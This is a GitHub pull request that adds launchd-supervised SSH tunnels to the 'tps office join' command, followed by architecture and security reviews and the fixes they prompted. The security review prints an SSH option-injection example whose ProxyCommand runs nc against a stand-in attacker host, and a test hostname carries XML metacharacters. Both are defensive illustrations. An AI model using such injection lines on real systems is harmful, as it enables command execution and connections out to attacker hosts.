ops-7x9y: `tps office join --tunnel-via` auto-provisioning by tps-anvil · Pull Request #285 · tpsdev-ai/cli

tps-anvil · 2026-05-17T15:07:16Z

Summary

Extends tps office join to auto-provision launchd supervision for SSH tunnels and persistent office connections via --tunnel-via <ssh-host>.

What it does

When --tunnel-via <ssh-host> is passed to tps office join:

Auto-picks an unused port in 33700–33999 (or uses --port <n>)
Generates + installs two launchd plists:
- ai.tpsdev.tunnel-<name> — ssh -N -L <port>:127.0.0.1:<port> <ssh-host>
- ai.tpsdev.office-<name> — bun run tps.js office connect <name>
Persists a supervision manifest at ~/.tps/branch-office/<name>/supervision.json
launchctl loads both units immediately
tps office revoke tears down supervision automatically (skip with --keep-units)
tps office status <name> reports launchd state

Design decisions

Idempotent: re-running on a supervised branch aborts unless --force. With --force, existing units are torn down and regenerated.
Atomic plist writes: tmp + renameSync (same pattern as flair.ts)
No secrets in manifest: supervision.json is mode 0644, stores only labels/paths/hostname
SSH reachability validation: ssh <host> exit 0 before provisioning
Best-effort error handling: supervision failures don't undo the join — the branch is still registered; the user gets a warning

Files changed

File	Change
`src/commands/office-supervision.ts`	New. Plist generation, port scanning, launchctl wrappers, manifest I/O, installation/teardown
`src/commands/office.ts`	Added `tunnelVia`, `port`, `force`, `keepUnits` to `OfficeArgs`. Supervision install in `case "join"`, teardown in `case "revoke"`, state reporting in `case "status"`
`bin/tps.ts`	Parsed `--tunnel-via`/`--port`/`--force`/`--keep-units` flags; passed to `runOffice`
`test/office-supervision.test.ts`	New. 15 tests: manifest I/O, plist rendering, port scanning, teardown

Test results

27 tests (15 new + 12 existing) — all pass

Out of scope (separate PRs)

Auto-installing Flair on the branch (ops-209a)
SSH key management
systemd support (Linux hosts)
Cross-host ProxyJump chain validation

Adds launchd supervision (SSH tunnel + persistent office connect) to tps office join: - --tunnel-via <ssh-host>: auto-provision two launchd plists after join handshake (ai.tpsdev.tunnel-<name> for the SSH tunnel, ai.tpsdev.office-<name> for persistent office connect) - --port <n>: override auto-pick from 33700-33999 range - --force: regenerate supervision when it already exists - --keep-units: skip supervision teardown on revoke tps office status <name> now reports supervision state via launchctl. tps office revoke <name> tears down supervision units (plist delete, launchctl unload, manifest removal) by default. New module: src/commands/office-supervision.ts - plist generation (atomic tmp+rename write, mirroring flair pattern) - port scanning across existing LaunchAgents - launchctl load/unload wrappers - supervision manifest read/write (0644, no secrets) - SSH reachability validation before install 15 tests in test/office-supervision.test.ts covering manifest I/O, plist rendering, port scanning, and teardown.

…matchAll Two CI fixes: - bin/tps.ts:130 had a duplicate `force` flag declaration (line 106 already declared it globally). TS1117. Removed the duplicate — supervision case reuses the global flag. - office-supervision.ts:48 used `while ((m = re.exec(content)) !== null)` which biome flags as noAssignInExpressions. Rewrote as `for (const m of content.matchAll(re))`. Same code, no behavior change. 15 tests still pass. Also rebased onto current main to drop the stale openclaw-tps-mail commit that #280 already shipped.

tps-kern

Architecture review — PR #285

Spec verification (5 checks)

1. Supervision manifest schema for ops-209a ✅ — SupervisionManifest is cleanly structured with tunnel + office + installedAt. Extensible: downstream readers cherry-pick what they need. No version field, but it's brand new — adding one now before anything ships would be cheap insurance. Not blocking.

2. Idempotency check ✅ — join --tunnel-via calls supervisionExists(agent); aborts without --force; tears down + reinstalls with --force. Wired correctly in office.ts.

3. Atomic plist write ✅ — writePlist uses .tmp + renameSync matching cli#281. Test asserts no stale .tmp. One difference from flair-config: flair-config uses ${p}.${process.pid}.tmp (PID-suffixed) for concurrent-write safety; writePlist uses bare .tmp. Low risk since tps office join is single-invocation, but the PID suffix pattern is strictly better for defense-in-depth. NIT.

4. Revoke teardown ✅ — teardownSupervision unloads both units, deletes both plist files, and deletes the manifest. --keep-units skips this. Ordering concern (see finding #1 below) but non-blocking.

5. Port scan range + collision detection ✅ — Range is 33700–33999 (300 ports). Regex scans launchd plists for -L <port>: patterns. Test verifies occupied-port skip, adjacent skip, and full-range exhaustion. Reasonable.

Findings

1. 🟡 Supervision teardown before revokeBranch (ordering)

In revoke, supervision is torn down before revokeBranch(agent, "manual revocation"). If revokeBranch fails (e.g., the branch directory is locked), supervision units are already gone and unrecoverable. The safer order is: revoke the branch first, then tear down supervision. The catch block makes this survivable (it's a warning, not a hard failure), but the ordering leaves a window where a failed revoke leaves the user with neither branch record nor supervision.

Fix: Move supervision teardown to after revokeBranch. If --keep-units, it's moot. If not, revokeBranch succeeds first, then supervision is torn down.

2. 🟡 isUnitLoaded always returns true (logic bug)

function isUnitLoaded(label: string): boolean {
  try {
    execSync(`launchctl list "${label}" 2>/dev/null || true`, { encoding: "utf-8" }).trim();
    return true;  // ← ALWAYS true because || true prevents execSync from throwing
  } catch {
    return false;
  }
}

The || true ensures execSync exit code is always 0, so the function unconditionally returns true regardless of whether the unit is loaded. The stdout is trimmed but never inspected.

Impact: Cosmetic. The only caller is unloadUnit, which has its own 2>/dev/null || true guard around the launchctl unload command. So unloadUnit always attempts to unload (even for non-existent units), which is harmless.

Fix: Check stdout — launchctl list <label> returns a tab-separated line like PID\tSTATUS\tLABEL when loaded, empty when not found (with || true):

const out = execSync(`launchctl list "${label}" 2>/dev/null || true`, { encoding: "utf-8" }).trim();
return out.length > 0 && out !== "-";

3. 🔵 generateOfficePlist hardcodes ~/ops/tps repo path

const tpsJs = join(home, "ops/tps/packages/cli/dist/bin/tps.js");

This assumes the TPS repo is cloned at ~/ops/tps and that dist/bin/tps.js exists (i.e., the project has been built). If a user clones to a different path or hasn't built, the plist points to a nonexistent binary and the supervised office process will fail to launch. This is a deployment assumption — document it, or consider resolving the path from the running process (process.argv[1] or import.meta.url).

4. 🔵 readSupervision can throw on malformed JSON

const raw = JSON.parse(readFileSync(p, "utf-8"));

No try/catch. Callers in office.ts wrap their calls in try/catch, so unhandled in practice, but a malformed file makes readSupervision opaque to callers who don't expect exceptions from a read function. Wrap JSON.parse or add a try/catch returning null.

Other observations

Test quality: 15 tests covering manifest I/O, plist rendering, port scanning, atomic write/delete, and teardown. Thorough.
Plist content: Both KeepAlive keys use <true/> (simple keepalive), not Crashed dict. Correct for crash-on-exit behavior.
Plist permissions: 0644 for plists (standard for LaunchAgents). Manifest 0644 — note tunnelVia is a host alias; no secrets stored. Reasonable.
unloadUnit best-effort design: Uses 2>/dev/null || true — won't crash on missing units. Correct pattern for teardown.
tps office status integration: The case "status" block dynamically imports office-supervision.js and reports unit state. Nice touch — status knows about supervision without coupling the module at load time. The --json path is noted as "not yet merged" — acceptable for initial ship.

APPROVE_WITH_NITS

tps-sherlock

Security review — PR #285

Findings (security/threat surface)

1. 🟡 SSH option injection in validateSshReachable — defense-in-depth gap

const result = spawnSync("ssh", [host, "exit", "0"], {
  stdio: "pipe",
  encoding: "utf-8",
  timeout: 15_000,
});

host comes directly from user-controlled --tunnel-via. spawnSync with array args correctly prevents shell injection, but does not prevent SSH option injection. If host starts with -, OpenSSH interprets it as an option:

ssh -oProxyCommand='nc attacker.com 22' exit 0

Here -oProxyCommand=... is processed as an option, exit becomes the hostname, 0 the command. The proxy command executes as part of the connection attempt. While the follow-on plist would fail (no host argument remains), the validation function itself is injectable.

Fix: Add -- before the host to end option processing:

spawnSync("ssh", ["--", host, "exit", "0"], { ... })

Same hardening should apply to the generated tunnel plist:

<array>
  <string>${ssh}</string>
  <string>-N</string>
  <string>-L</string>
  <string>${params.localPort}:127.0.0.1:${params.localPort}</string>
  <string>--</string>
  <string>${params.tunnelVia}</string>
</array>

2. Minor — tunnelVia interpolated raw into XML without escaping

<string>${params.tunnelVia}</string>

If tunnelVia contains <, >, &, or ", the plist XML is malformed. Not a security issue (user attacks their own plist), but a robustness concern. Consider tunnelVia.replace(/[&<>"]/g, ...) or documenting that hostnames must not contain XML metacharacters.

3. ✅ Port scan reads own user dir only — VERIFIED

const launchAgentsDir = join(home, "Library", "LaunchAgents");

Only the caller's home directory is scanned. Unreadable plists are caught and skipped:

try {
  const content = readFileSync(join(launchAgentsDir, f), "utf-8");
  ...
} catch {
  // unreadable plist → skip
}

No panic on missing directory or unreadable file.

4. ✅ Supervision manifest mode 0644 — VERIFIED safe

writeFileSync(p, JSON.stringify(manifest, null, 2), { encoding: "utf-8", mode: 0o644 });

Manifest contains only plist labels, filesystem paths, local port, tunnel hostname, and timestamp. No credentials, tokens, or private keys. The auth path lives in flair.json (mode 0600, separate PR #284). 0644 is correct for this data.

5. ✅ Atomic write pattern — VERIFIED

const tmp = dest + ".tmp";
writeFileSync(tmp, content, { encoding: "utf-8", mode: 0o644 });
renameSync(tmp, dest);

Consistent with cli#281 and #284 patterns. .tmp file is cleaned up via rename.

6. ✅ Teardown safety — VERIFIED

Revocation proceeds even if supervision teardown fails:

try {
  ... teardownSupervision(agent) ...
} catch (e: any) {
  console.error(`⚠️  Supervision teardown warning: ${e.message}`);
  // Don't fail — revocation should still proceed
}

--keep-units flag provides an escape hatch. --force prevents accidental overwrite during re-join. Good UX/safety balance.

Verdict

APPROVE_WITH_NITS

Core architecture is sound: atomic writes, scoped file permissions, graceful error handling, no secrets in world-readable files. The SSH option injection is the only material finding — the exploit path is constrained (user controls their own --tunnel-via, and a successful injection in validation would leave the plist without a host argument), but defense-in-depth with -- is cheap, standard, and correct. Recommend applying before merge.

Finding 1 (architecture): Move supervision teardown AFTER revokeBranch succeeds, so supervision is not orphaned if revokeBranch throws. Finding 2 (architecture): Fix isUnitLoaded — it now checks stdout content (non-empty and not "-") instead of always returning true. Finding 3 (architecture): Make TPS CLI path configurable via TPS_CLI_PATH env var, falling back to ~/ops/tps/packages/cli/dist/bin/tps.js. Finding 4 (architecture): Guard JSON.parse in readSupervision with try/catch; throw descriptive error for corrupt manifest files. Finding 5 (security): Add -- terminator before hostname in both validateSshReachable and generateTunnelPlist to prevent SSH option injection when host starts with -. XML-escape hostname in plist templates for robustness with metacharacters. Optional NIT: Atomic write tmp suffix now includes process.pid (defense-in-depth for concurrent plist writes). Tests: +7 regression tests covering findings 2, 3, 4, 5 (corrupt manifest, TPS_CLI_PATH override, XML escaping, dash-hostname in plist, -- in error messages, port scanning with -- terminator).

tps-kern

Architecture re-review — all r1 findings addressed. APPROVED.

Kern r1 nits verified:

🟡 #1: teardown moved AFTER revokeBranch ✅
🟡 #2: isUnitLoaded inspects stdout (out.length > 0 && out !== '-') ✅
🔵 #3: TPS_CLI_PATH env var with sensible fallback; resolveTpsJs() isolated ✅
4th: JSON.parse guarded with descriptive throw ✅

Sherlock r1 nits verified:

🟡 #5: -- before hostname in both validateSshReachable and tunnel plist ✅
xmlEscape() on tunnelVia, ssh, bun, tpsJs — prevents XML injection in plists ✅
Plist regex ignores port-like tokens after -- ✅

Bonus fix: writePlist now uses PID-suffixed .tmp (matching flair-config pattern from r1 comment).

tps-sherlock

Security re-review — PR #285 (r2)

All r1 findings addressed:

1. SSH option injection — FIXED ✅

// validateSshReachable
spawnSync("ssh", ["--", host, "exit", "0"], { ... })

// Tunnel plist
<string>--</string>
<string>${xmlEscape(params.tunnelVia)}</string>

-- terminates option processing before hostname in both validation and persistent tunnel plist. Test asserts command format in error message.

2. XML escaping — FIXED ✅

function xmlEscape(s: string): string {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

Applied to ssh, bun, tpsJs, and tunnelVia in plist generation. Test covers metacharacter hostname evil-host&<>".

3. Additional hardening verified:

isUnitLoaded now inspects stdout content (out.length > 0 && out !== "-") ✅
readSupervision guards JSON.parse with descriptive error on corrupt manifest ✅
Hardcoded path replaced with resolveTpsJs() + TPS_CLI_PATH env override ✅
Teardown moved AFTER revokeBranch to prevent orphaning on revoke failure ✅
Atomic write uses .${process.pid}.tmp (consistent with cli#284 pattern) ✅

No new security surfaces introduced.

APPROVED

tps-anvil requested a review from a team as a code owner May 17, 2026 15:07

tps-anvil and others added 2 commits May 17, 2026 08:11

tps-flint force-pushed the feat-office-join-tunnel-via branch from 7d62710 to de90bbd Compare May 17, 2026 15:14

tps-kern previously approved these changes May 17, 2026

View reviewed changes

tps-sherlock previously approved these changes May 17, 2026

View reviewed changes

tps-anvil dismissed stale reviews from tps-sherlock and tps-kern via 10d8357 May 17, 2026 15:25

tps-kern approved these changes May 17, 2026

View reviewed changes

tps-sherlock approved these changes May 17, 2026

View reviewed changes

tps-flint merged commit a8b0b07 into main May 17, 2026
11 checks passed

tps-flint deleted the feat-office-join-tunnel-via branch May 17, 2026 15:28

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ops-7x9y: `tps office join --tunnel-via` auto-provisioning#285

ops-7x9y: `tps office join --tunnel-via` auto-provisioning#285
tps-flint merged 3 commits into
mainfrom
feat-office-join-tunnel-via

tps-anvil commented May 17, 2026

Uh oh!

tps-kern left a comment

Uh oh!

tps-sherlock left a comment

Uh oh!

tps-kern left a comment

Uh oh!

tps-sherlock left a comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

Conversation

tps-anvil commented May 17, 2026

Summary

What it does

Design decisions

Files changed

Test results

Out of scope (separate PRs)

Uh oh!

tps-kern left a comment

Choose a reason for hiding this comment

Architecture review — PR #285

Spec verification (5 checks)

Findings

Other observations

Uh oh!

tps-sherlock left a comment

Choose a reason for hiding this comment

Security review — PR #285

Findings (security/threat surface)

Verdict

Uh oh!

tps-kern left a comment

Choose a reason for hiding this comment

Uh oh!

tps-sherlock left a comment

Choose a reason for hiding this comment

Security re-review — PR #285 (r2)

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants